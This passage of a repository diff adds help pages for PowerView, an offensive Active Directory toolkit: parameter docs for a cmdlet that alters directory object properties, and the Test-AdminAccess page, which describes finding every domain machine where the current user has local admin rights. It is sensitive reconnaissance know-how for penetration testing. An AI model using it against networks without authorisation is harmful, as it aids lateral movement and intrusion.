+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Set
+Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values.
+
+```yaml
+Type: Hashtable
+Parameter Sets: (All)
+Aliases: Reaplce
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -XOR
+Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values.
+
+```yaml
+Type: Hashtable
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Clear
+Specifies an array of object properties that will be cleared in the directory.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+{{Fill SecurityMasks Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ADObject
+
+Custom PSObject with translated AD object property fields, if -PassThru is enabled.
+
+PowerView.ADObject.Raw
+
+The raw DirectoryServices.SearchResult object, if -PassThru and -Raw are enabled.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Test-AdminAccess.md b/docs/Recon/Test-AdminAccess.md
new file mode 100755
index 0000000..84eab4e
--- /dev/null
+++ b/docs/Recon/Test-AdminAccess.md
@@ -0,0 +1,101 @@
+# Test-AdminAccess
+
+## SYNOPSIS
+Tests if the current user has administrative access to the local (or a remote) machine.
+
+Idea stolen from the local_admin_search_enum post module in Metasploit written by:
+ 'Brandon McCann "zeknox" \<bmccann\[at\]accuvant.com\>'
+ 'Thomas McCarthy "smilingraccoon" \<smilingraccoon\[at\]gmail.com\>'
+ 'Royce Davis "r3dy" \<rdavis\[at\]accuvant.com\>'
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Test-AdminAccess [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will use the OpenSCManagerW Win32API call to establish
+a handle to the remote host.
+If this succeeds, the current user context
+has local administrator acess to the target.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Test-AdminAccess -ComputerName sqlserver
+```
+
+Returns results indicating whether the current user has admin access to the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainComputer | Test-AdminAccess
+```
+
+Returns what machines in the domain the current user has access to.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Test-AdminAccess -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to check for local admin access (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.AdminAccess
+
+A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether
+the current user has local admin rights, along with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
+
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-25 22:07:58 +0000